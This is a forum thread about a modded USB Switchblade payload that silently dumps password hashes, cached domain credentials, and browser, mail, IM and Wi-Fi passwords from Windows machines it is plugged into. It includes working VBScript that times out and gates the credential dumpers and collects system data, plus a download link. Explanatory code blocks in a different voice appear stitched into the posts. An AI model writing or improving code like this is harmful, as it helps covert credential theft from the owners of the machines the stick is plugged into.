
Beakmyn's Switchblade (mod of Gonzor) written in vbs with HTML output


beakmyn

This version doesn't use SBConfig. It requires that the user be able to open the Payload.ini in Notepad (or another text editor) and manually make edits to the ini file.

Screenshot of the HTML output: http://www.frontiernet.net/~beakmyn/output.jpg

I found a couple of issues. Since I used the WinAudit HTML layout as an example I missed a title block and it will say

"WinAudit Freeware v2.27 Unicode"  :lol: Whoops, not sure how that one slipped past.

Also, if you're going to use this to run an audit against a Windows XP Home edition machine be sure to disable cachedump. It doesn't appear to exit gracefully and hangs. This is an issue with cachedump and the fact that an XP Home edition machine cannot be part of a Windows domain, so no cache information will exist.

I think I'll add some checking to force certain tools not to run if the system is XP Home, and possibly if you don't have admin, since the tools will fail anyway.

I'll make the fixes and re-post a new file.

Oh, to view the file click on the Computername-date-time.html not the "left" or "right" file.


Great payload, I really <3 the HTML output!!!  :-P


I downloaded... I installed... I messed up. It stalls with wscript in Task Manager and sits there (if I try and run payload.vbs I get 'error 3 cannot find the path specified'). Where exactly does payload.ini go? I assume flash partition /SRC/payload.ini.

If at first you don't succeed, hak hak again. I think this needs the kill switch though (if safety.txt in C goto end). But maybe I'll get it working today... Also, since you're creating your HTML output, could you goose this thing to make a copy of the wpl files in the folder (Windows activation; if OS == WindowsXP, not sure how that would work)? And make the path for the log changeable (to the Documents folder or something I wouldn't have to dive into hidden folders to find).

Just my 2 cents

I did find out I needed to update the stock launchpad to get Vista compatibility... but that doesn't count towards this

Yet another update... why are there shortcuts for sbs and sbs2 (pointing to openssh and a path to the desktop)?


> I downloaded... I installed... I messed up. It stalls with wscript in Task Manager and sits there (if I try and run payload.vbs I get 'error 3 cannot find the path specified'). Where exactly does payload.ini go? I assume flash partition /SRC/payload.ini.
>
> If at first you don't succeed, hak hak again. I think this needs the kill switch though (if safety.txt in C goto end). But maybe I'll get it working today... Also, since you're creating your HTML output, could you goose this thing to make a copy of the wpl files in the folder (Windows activation; if OS == WindowsXP, not sure how that would work)? And make the path for the log changeable (to the Documents folder or something I wouldn't have to dive into hidden folders to find).

payload.ini should be in the flash drive partition's src folder.

payload.vbs cannot be run without providing the path to the U3 and flash partitions (look at how I call it in autorun); I figured it was easier to pass the paths rather than re-run the drive search utility.

I'll add an option for the output directory into the payload.ini.

I'll add a safety.txt option also.

I'd have to see it lock up to know what it was trying to do. What's the last thing in the HTML? Because I'm bypassing error handling in the vbs it makes it harder to debug. If you wanted I could work with you on manually running it without the "on error resume next" so we could debug it.

> Just my 2 cents
>
> I did find out I needed to update the stock launchpad to get Vista compatibility... but that doesn't count towards this

Hmm, I thought it had the latest vista capable launchpad. I'll have to get the latest.

> Yet another update... why are there shortcuts for sbs and sbs2 (pointing to openssh and a path to the desktop)?

I think that is for the Hacksaw, which isn't implemented/tested yet in my code. I'll remove the files and fix the payload since I have no intention of adding them in.

I'm still working on a bullet-proof silent device eject.

I'll get an update out early next week.


For whatever reason (I can't say for certain since this one is relatively new) the default in your ini is FGDump; when it's selected, cachedump still tries to run and FGDump stalls. When however cachedump is selected it goes smooth as silk.

Going to dive a bit further into your code this week and see what I can see.


For the cache dump I use either fgdump -w (this tells it to skip dumping passwords and dump the cache) or Cachedump.

Interestingly, I found that on my test machine (XP Pro) using fgdump worked but using cachedump (Gonzor's bundled version 1.x) would hang, the opposite of what you see happening.

However, my payload now uses Cachedump 1.3

Note: Versions 1.0, 1.1 and 1.2 of cachedump all reported as 1.0 when queried for version. This was fixed in 1.3

Cachedump is really only valid when a user logs on using a domain account but is not connected to the domain. Since this seems to be a common sticking point I'm looking into implementing a watchdog timer. So, if the program doesn't close within X seconds I'll force it to close. X would be configured via the payload.ini; typically it should be 2-5 seconds.
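A watchdog of the kind described in the post above (kill the tool if it has not exited within a configurable number of seconds), as an added VBScript example; this is not beakmyn's payload code. It runs the tool through cmd.exe with output redirected to a file, polls WshScriptExec.Status, and on timeout terminates the process tree through WMI Win32_Process, because WshScriptExec.Terminate would only kill the cmd.exe wrapper and leave a hung cachedump behind. The tool path, output file and 5-second limit are hypothetical values; in the payload they would be read from Payload.ini.

```vbscript
Option Explicit

' Added example, not part of the original Switchblade payload.
' Runs a command through cmd.exe with stdout/stderr redirected to a file and
' terminates the whole process tree if it has not finished within the timeout.
' The tool path, output file and timeout below are assumed/hypothetical values.

Dim objShell, objWMI, objFSO, blnOk
Set objShell = CreateObject("WScript.Shell")
Set objFSO   = CreateObject("Scripting.FileSystemObject")
Set objWMI   = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")

' KillTree terminates process lngPid and every descendant found through
' Win32_Process.ParentProcessId (children first, then the parent itself).
Sub KillTree(lngPid)
    Dim colChildren, objChild, colSelf, objSelf
    Set colChildren = objWMI.ExecQuery("SELECT ProcessId FROM Win32_Process WHERE ParentProcessId = " & lngPid)
    For Each objChild In colChildren
        KillTree objChild.ProcessId
    Next
    Set colSelf = objWMI.ExecQuery("SELECT * FROM Win32_Process WHERE ProcessId = " & lngPid)
    For Each objSelf In colSelf
        objSelf.Terminate
    Next
End Sub

' RunWithWatchdog runs strCmdLine via cmd.exe, redirecting its output to
' strOutFile. Returns True if the command exited on its own within
' intTimeoutSec seconds, False if the watchdog had to kill it.
Function RunWithWatchdog(strCmdLine, strOutFile, intTimeoutSec)
    Dim objExec, intElapsedMs, strComspec
    strComspec = objShell.ExpandEnvironmentStrings("%comspec%")
    ' Exec (not Run) is used so that the cmd.exe PID is available for KillTree.
    ' The extra outer quotes keep cmd /c from stripping the ones around the paths.
    Set objExec = objShell.Exec(strComspec & " /c """ & strCmdLine & " > """ & strOutFile & """ 2>&1""")
    intElapsedMs = 0
    Do While objExec.Status = 0          ' 0 = WshRunning, 1 = WshFinished
        WScript.Sleep 250
        intElapsedMs = intElapsedMs + 250
        If intElapsedMs >= intTimeoutSec * 1000 Then
            KillTree objExec.ProcessID   ' kills the tool, then the cmd.exe wrapper
            RunWithWatchdog = False
            Exit Function
        End If
    Loop
    RunWithWatchdog = True
End Function

' Usage with hypothetical paths (the real payload passes these in from Payload.ini).
blnOk = RunWithWatchdog("""D:\SRC\cachedump.exe""", "D:\SRC\cachedump.txt", 5)
If Not blnOk Then
    ' Leave a marker in the output so the HTML report shows why the section is empty.
    objFSO.OpenTextFile("D:\SRC\cachedump.txt", 8, True).WriteLine "[watchdog] cachedump terminated after 5 seconds"
End If
WScript.Echo "cachedump finished on its own: " & blnOk
```

Because cmd.exe's own stdout is never read, a tool that prints a lot cannot block on a full pipe while the script sleeps; everything goes to the file. The same function works for pwdump and fgdump, which is why a single timeout key in the ini is enough.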


How does one know when he is really bored....

http://harrea.100webspace.net/SysInfo.jpg

    ' Objects the rest of the payload already provides; created here so the snippet runs on its own
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    Set objRightFile = objFSO.CreateTextFile("right.html", True)
    strUserName = CreateObject("WScript.Network").UserName

    objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""2"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _
    "<td class=""colhead""><b>Item</b></td>" & _
    "<td class=""colhead""><b>Value</b></td></tr>"

    ' SWbemDateTime converts WMI's yyyymmddHHMMSS.mmmmmmsUUU timestamps into VBScript dates
    Set dtmConvertedDate = CreateObject("WbemScripting.SWbemDateTime")

    ' Local CIMv2 namespace (the backslashes in \\.\root\cimv2 are required)
    Set objWMIService = GetObject("winmgmts:" _
     & "{impersonationLevel=impersonate}!\\.\root\cimv2")

    Set colOSes = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
    For Each objOS in colOSes
        objRightFile.WriteLine "<tr><td><b>Logged On User</b></td><td>" & strUserName & "</td></tr>"
        objRightFile.WriteLine "<tr><td><b>Computer Name</b></td><td>" & objOS.CSName & "</td></tr>"
        objRightFile.WriteLine "<tr><td><b>Caption</b></td><td>" & objOS.Caption & "</td></tr>"
        objRightFile.WriteLine "<tr><td><b>Build Number</b></td><td>" & objOS.BuildNumber & "</td></tr>"
        objRightFile.WriteLine "<tr><td><b>Build Type</b></td><td>" & objOS.BuildType & "</td></tr>"
        objRightFile.WriteLine "<tr><td><b>Boot Device</b></td><td>" & objOS.BootDevice & "</td></tr>"
        ' Win32_OperatingSystem names this property CountryCode (not CCountryCode)
        objRightFile.WriteLine "<tr><td><b>Country Code</b></td><td>" & objOS.CountryCode & "</td></tr>"
        objRightFile.WriteLine "<tr><td><b>Debug</b></td><td>" & objOS.Debug & "</td></tr>"
        objRightFile.WriteLine "<tr><td><b>Encryption Level</b></td><td>" & objOS.EncryptionLevel & "</td></tr>"
        dtmConvertedDate.Value = objOS.InstallDate
        dtmInstallDate = dtmConvertedDate.GetVarDate
        objRightFile.WriteLine "<tr><td><b>Install Date</b></td><td>" & dtmInstallDate & "</td></tr>"
        objRightFile.WriteLine "<tr><td><b>Licensed Users</b></td><td>" & objOS.NumberOfLicensedUsers & "</td></tr>"
        objRightFile.WriteLine "<tr><td><b>Organization</b></td><td>" & objOS.Organization & "</td></tr>"
        ' The language property is OSLanguage (a numeric locale ID such as 1033); there is no Language property
        objRightFile.WriteLine "<tr><td><b>Language</b></td><td>" & objOS.OSLanguage & "</td></tr>"
        objRightFile.WriteLine "<tr><td><b>OS Type</b></td><td>" & objOS.OSType & "</td></tr>"
        objRightFile.WriteLine "<tr><td><b>Primary OS</b></td><td>" & objOS.Primary & "</td></tr>"
        objRightFile.WriteLine "<tr><td><b>Registered User</b></td><td>" & objOS.RegisteredUser & "</td></tr>"
        objRightFile.WriteLine "<tr><td><b>Serial Number</b></td><td>" & objOS.SerialNumber & "</td></tr>"
        objRightFile.WriteLine "<tr><td><b>Other Type Description</b></td><td>" & objOS.OtherTypeDescription & "</td></tr>"
        objRightFile.WriteLine "<tr><td><b>Version</b></td><td>" & objOS.Version & "</td></tr>"
        objRightFile.WriteLine "<tr><td><b>Service Pack</b></td><td>" & objOS.ServicePackMajorVersion & "." & _
            objOS.ServicePackMinorVersion & "</td></tr>"
    Next

    Set dtmConvertedDate = Nothing
    Set objWMIService = Nothing
    Set colOSes = Nothing
    'End Table: close the OS table before the BIOS section opens its own
    objRightFile.WriteLine "</tbody></table>"

http://harrea.100webspace.net/BIOS.jpg

    objRightFile.WriteLine "<hr color=""#0066cc"" size=""2"" width=""400"">"
    objRightFile.WriteLine "<p><font size=""3""><b>BIOS</b></font>"
    objRightFile.WriteLine "<hr color=""#0066cc"" size=""2"" width=""400"">"
    objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""2"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _
    "<td class=""colhead""><b>Item</b></td>" & _
    "<td class=""colhead""><b>Value</b></td></tr>"

    Set dtmConvertedDate = CreateObject("WbemScripting.SWbemDateTime")

    ' Local CIMv2 namespace (the backslashes in \\.\root\cimv2 are required)
    Set objWMIService = GetObject("winmgmts:" _
     & "{impersonationLevel=impersonate}!\\.\root\cimv2")

    Set colBIOS = objWMIService.ExecQuery("Select * from Win32_BIOS")
    For Each objBIOS in colBIOS
        objRightFile.WriteLine "<tr><td><b>Build Number</b></td><td>" & objBIOS.BuildNumber & "</td></tr>"
        objRightFile.WriteLine "<tr><td><b>Current Language</b></td><td>" & objBIOS.CurrentLanguage & "</td></tr>"
        objRightFile.WriteLine "<tr><td><b>Manufacturer</b></td><td>" & objBIOS.Manufacturer & "</td></tr>"
        objRightFile.WriteLine "<tr><td><b>Name</b></td><td>" & objBIOS.Name & "</td></tr>"
        objRightFile.WriteLine "<tr><td><b>Primary BIOS</b></td><td>" & objBIOS.PrimaryBIOS & "</td></tr>"
        dtmConvertedDate.Value = objBIOS.ReleaseDate
        dtmReleaseDate = dtmConvertedDate.GetVarDate
        objRightFile.WriteLine "<tr><td><b>Release Date</b></td><td>" & dtmReleaseDate & "</td></tr>"
        objRightFile.WriteLine "<tr><td><b>Serial Number</b></td><td>" & objBIOS.SerialNumber & "</td></tr>"
        ' Win32_BIOS names this SMBIOSBIOSVersion; there is no SMBIOSVersion property
        objRightFile.WriteLine "<tr><td><b>SMBIOS Version</b></td><td>" & objBIOS.SMBIOSBIOSVersion & "</td></tr>"
        objRightFile.WriteLine "<tr><td><b>SMBIOS Major Version</b></td><td>" & objBIOS.SMBIOSMajorVersion & "</td></tr>"
        objRightFile.WriteLine "<tr><td><b>SMBIOS Minor Version</b></td><td>" & objBIOS.SMBIOSMinorVersion & "</td></tr>"
        objRightFile.WriteLine "<tr><td><b>SMBIOS Present?</b></td><td>" & objBIOS.SMBIOSPresent & "</td></tr>"
        objRightFile.WriteLine "<tr><td><b>Status</b></td><td>" & objBIOS.Status & "</td></tr>"
        objRightFile.WriteLine "<tr><td><b>Version</b></td><td>" & objBIOS.Version & "</td></tr>"
    Next
    Set dtmConvertedDate = Nothing
    Set objWMIService = Nothing
    Set colBIOS = Nothing
    'End Table
    objRightFile.WriteLine "</tbody></table></p><p> </p>"


Beak... when you get a chance add me on your messenger. I got a lot of this hammered out with HTML and whatnot but some things are driving me up a wall and I can't get a handle on the problem. For example, the pwdump file is marked for delete in the ini but the damn thing doesn't die. It just leaves the file in the directory regardless of the setting.


Yeah, that happens sometimes. It's not a bad thing if they're left there IMHO, as it's easier to use the dump file rather than extract the hashes from the HTML file if you need to use them in JTR or OPH. I have better luck with fgdump, btw.

I'm going to variablize as much of the script as possible to make it easier to work with. I have 1.5GB of programs on my drive and it's a pain to have to reflash to test (takes 30-45 min).


Just to give everybody a heads-up on what's being tested:

OS-specific running of payload

checking if user is admin to prevent running code that requires admin privilege

Copy wpa file to stick

configurable log path

Don't run cachedump if machine isn't a member of a domain

better clean-up

BIOS info
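The pre-flight checks in the list above (OS edition, admin rights, domain membership, configurable log path), together with the safety.txt kill switch requested earlier in the thread, as an added VBScript example; this is not the payload's own code. The D:\SRC path and the Payload.ini section and key names ([Options] SafetyFile and LogPath, [Tools] cachedump and pwdump) are assumptions made for the example; the real ini layout is whatever the payload ships with.

```vbscript
Option Explicit

' Added example, not the Switchblade payload's own code: checks a payload
' would run before launching the dump tools. Paths and ini key names are
' assumed/hypothetical; edit them to match the real Payload.ini.

Dim objFSO, objShell, objWMI
Set objFSO   = CreateObject("Scripting.FileSystemObject")
Set objShell = CreateObject("WScript.Shell")
Set objWMI   = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")

' ReadIni returns the value of strKey in [strSection] of strFile, or strDefault.
' Minimal parser: ';' comment lines, key=value pairs, case-insensitive names.
Function ReadIni(strFile, strSection, strKey, strDefault)
    Dim objFile, strLine, strCurSection, intPos
    ReadIni = strDefault
    If Not objFSO.FileExists(strFile) Then Exit Function
    strCurSection = ""
    Set objFile = objFSO.OpenTextFile(strFile, 1)
    Do Until objFile.AtEndOfStream
        strLine = Trim(objFile.ReadLine)
        If strLine = "" Or Left(strLine, 1) = ";" Then
            ' blank line or comment: nothing to do
        ElseIf Left(strLine, 1) = "[" And Right(strLine, 1) = "]" Then
            strCurSection = LCase(Mid(strLine, 2, Len(strLine) - 2))
        ElseIf strCurSection = LCase(strSection) Then
            intPos = InStr(strLine, "=")
            If intPos > 0 Then
                If LCase(Trim(Left(strLine, intPos - 1))) = LCase(strKey) Then
                    ReadIni = Trim(Mid(strLine, intPos + 1))
                    Exit Do
                End If
            End If
        End If
    Loop
    objFile.Close
End Function

' IsHomeEdition: bit 0x200 (VER_SUITE_PERSONAL) of Win32_OperatingSystem.SuiteMask
' is set on XP Home and the Vista Home editions; the Caption check is a fallback.
Function IsHomeEdition()
    Dim objOS
    IsHomeEdition = False
    For Each objOS In objWMI.ExecQuery("SELECT SuiteMask, Caption FROM Win32_OperatingSystem")
        If Not IsNull(objOS.SuiteMask) Then
            If (objOS.SuiteMask And 512) <> 0 Then IsHomeEdition = True
        End If
        If InStr(1, objOS.Caption, "Home", vbTextCompare) > 0 Then IsHomeEdition = True
    Next
End Function

' IsDomainMember: Win32_ComputerSystem.PartOfDomain. A workgroup machine has
' no cached domain logons, so cachedump has nothing to dump and may hang.
Function IsDomainMember()
    Dim objCS
    IsDomainMember = False
    For Each objCS In objWMI.ExecQuery("SELECT PartOfDomain FROM Win32_ComputerSystem")
        IsDomainMember = objCS.PartOfDomain
    Next
End Function

' IsAdmin: 'net session' needs administrative rights and exits non-zero
' otherwise; on Vista it also fails when the script is not elevated.
Function IsAdmin()
    Dim strComspec
    strComspec = objShell.ExpandEnvironmentStrings("%comspec%")
    IsAdmin = (objShell.Run(strComspec & " /c net session >nul 2>&1", 0, True) = 0)
End Function

' ---- main: constructed paths; the real payload gets them from autorun ----
Dim strSrc, strIni, strSafety, strLog, blnRunCachedump, blnRunPwdump
strSrc    = "D:\SRC"                                   ' flash partition src folder (assumed)
strIni    = strSrc & "\Payload.ini"
strSafety = ReadIni(strIni, "Options", "SafetyFile", "C:\safety.txt")
strLog    = ReadIni(strIni, "Options", "LogPath", strSrc & "\logs")

' Kill switch: your own machines carry the safety file, so stop before touching anything.
If objFSO.FileExists(strSafety) Then WScript.Quit 0

' Configurable log path (CreateFolder makes one level; the parent must exist).
If Not objFSO.FolderExists(strLog) Then objFSO.CreateFolder strLog

blnRunCachedump = (LCase(ReadIni(strIni, "Tools", "cachedump", "no")) = "yes")
blnRunPwdump    = (LCase(ReadIni(strIni, "Tools", "pwdump", "no")) = "yes")

' Tools that read the SAM or LSA secrets need admin; skip them instead of
' letting them fail silently under On Error Resume Next.
If Not IsAdmin() Then
    blnRunCachedump = False
    blnRunPwdump = False
End If
' No domain means no cached credentials (and XP Home can never join one).
If IsHomeEdition() Or Not IsDomainMember() Then blnRunCachedump = False

WScript.Echo "admin=" & IsAdmin() & " home=" & IsHomeEdition() & " domain=" & IsDomainMember()
WScript.Echo "run cachedump=" & blnRunCachedump & "  run pwdump=" & blnRunPwdump & "  log=" & strLog
```

Run it with cscript so the Echo lines land on the console. The decisions are computed before any tool is launched, so a hang in cachedump on a workgroup or XP Home box is avoided rather than timed out.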


Version 0.3.1

Payload alteration:

Minor typo in XP activation backup (missing space between hardware & modification)

Changed path of wpa.dbl (in case it is rerun and a new license was copied; prevents overwriting files)

Removed additional language help files from launchpad.zip (freed up about 200k)

Added 5 second watchdog timer to pwdump, fgdump and cachedump. If they don't finish within 5 seconds they're terminated.

Nir changed his HTML output so I made mine a bit more flexible at finding the data in the HTML.

IEHV from 1.3.1.0 to 1.3.6.0

Added new option: Show All Google Searches.

1.35 Updated the 'Select User Profile' option to work properly under Vista.

1.34 Dates are now formatted according to user locale, instead of system locale in previous versions.

1.33 A tooltip is displayed when a string in a column is longer than the column length. New option: Copy URL. (Copy to the clipboard only the URL)

1.32 Fixed bug: '???????????' string appeared in the title, while it should be empty. Fixed bug: Wrong 'Modified Date' values on IE6 with XP/SP2 and IE7.

IEPV from 1.0.4.0 to 1.0.7.0

Version 1.07 Fixed bug: IE PassView failed to detect the AutoComplete passwords of URLs the end with '/' character (On Internet Explorer 7). Added support for Web sites file (iepv_sites.txt) - for decrypting the passwords of Internet Explorer 7.0 even when the history file is empty.

Version 1.06 The configuration is now saved to a file instead of the Registry.

Version 1.05 Fixed a small bug that caused IE PassView to hang in some computers.

Version 1.04 Added support for IE7 under Windows Vista.

MAILPV from 1.3.8.142 to 1.4.2.148

1.42  Added support for retrieving Hotmail/MSN mail accounts from the latest version of Windows Messenger. Added support for Gmail Notifier application under IE7. 

1.41  Configuration is now saved to a file instead of the Registry. 

1.40  Added support for SMTP and NNTP accounts on Windows Mail. Fixed problems with Thunderbird 2 accounts. 

MSPASS from 1.1.0.125 to 1.1.6.133

Version 1.16 - Added support for Google Talk password, if it's stored by Google Desktop.

Version 1.15 - The configuration is now saved to a file instead of the Registry.

Version 1.14 - Added support for AIM 6.x and AIM pro.

Version 1.13 - Windows Live Messenger passwords are now shown under Vista even without admin rights.

Version 1.12 - Fixed bug: Pidgin passwords were not shown when using the save command-line options.

Version 1.11 - Added support for Pidgin (Successor of GAIM)

NETPASS from 1.1.0.0 to 1.1.2.0

Version 1.12: The configuration is now saved to a file instead of the Registry.

Version 1.11: Under Vista, this utility now runs as admin automatically. You don't have to explicitly choose the "Run As Administrator" option.

PRODUKEY from 1.0.6.0 to 1.1.0.0

Version 1.10: Added filters by product type.

Version 1.08: The configuration of ProduKey is now saved to a file instead of the Registry.

Version 1.07: Added support for product key of Ms-Office under x64, when it's retrieved from external Registry file.

WIFIKE from 1..3.0 to 1.1.5.0

Version 1.15 - Added support for deleting the wireless keys of old network adapters.

WUL from 1.1.3.18 to 1.2.1.22

Version 1.20: Changed Operating System column to Application. Added filter by application (Windows, .NET, and others) Added 'Last Modified Time' column. Fixed Web link for .NET Updates. Configuration is now saved to cfg file instead of the Registry. Updates with extra sub-key level (in the Registry) are now displayed properly.

Version 1.13: A tooltip is now displayed when a string in a column is longer than the column length.

http://rapidshare.com/files/79403074/switc...e0.3.2.zip.html
